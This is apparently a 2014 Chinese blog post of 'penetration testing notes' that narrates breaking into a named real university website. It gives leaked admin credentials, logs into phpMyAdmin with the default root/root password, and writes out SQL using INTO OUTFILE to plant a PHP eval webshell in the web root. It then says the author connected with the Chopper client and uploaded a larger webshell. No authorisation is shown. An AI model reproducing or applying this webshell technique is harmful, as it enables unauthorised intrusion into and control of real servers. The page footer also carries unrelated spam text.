qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          滲透測試筆記

          今天朋友在入侵織夢的網站系統,通過最新的Exp獲得了織夢后臺的賬號和密碼
            賬號:admin
            密碼:abc123456
            但是,找來找去找不到后臺,就讓我提權試試。
            我看了下:http://pxc.ncist.edu.cn/dede/
            后臺被刪除了!怎么辦??
            google hack也沒找到后臺
            后來,我試了試這個網站:http://zsjy.ncist.edu.cn/phpmyadmin
            輸入默認MySql賬號與密碼:
            賬號:root
            密碼:root
            居然進去了:
            接下來就是phpmyadmin提權了:
            我的思路是:
            1.先爆出php服務器www的路徑
            2.然后通過將php一句話插入數據庫再導出到www路徑
            通過google hack爆到路徑:D\www\
            呵呵,接下來就執行sql語句:
          CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
          INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
          SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
            這段sql意思是:
            1.在mysql數據庫中建一張表叫xss,在xss表中生成一個field(字段)叫xss1
            2.將php一句話木馬插入數據庫中的xss1字段處
            3.將數據庫中xss1字段的內容導出到d:\www\x.php文件中
            這下,通過chopper連接x.php小馬得到shell


           接下來,上傳一個php大馬spider.php
            通過FF連接spider.php:
            成功獲得webshell!!!

          posted on 2014-04-24 10:21 順其自然EVO 閱讀(509) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄安全性測試

          <2014年4月>
          303112345
          6789101112
          13141516171819
          20212223242526
          27282930123
          45678910

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 兴文县| 大荔县| 昌图县| 高要市| 绩溪县| 清水河县| 丹寨县| 新乐市| 福安市| 南雄市| 高陵县| 垫江县| 红原县| 鹤壁市| 阳谷县| 分宜县| 双流县| 威海市| 磴口县| 涞水县| 布拖县| 泉州市| 和硕县| 通海县| 萝北县| 大渡口区| 太仆寺旗| 呼伦贝尔市| 怀安县| 贵定县| 托克托县| 郯城县| 田林县| 尼勒克县| 杭州市| 乐安县| 建宁县| 浮梁县| 彭泽县| 普兰店市| 如皋市|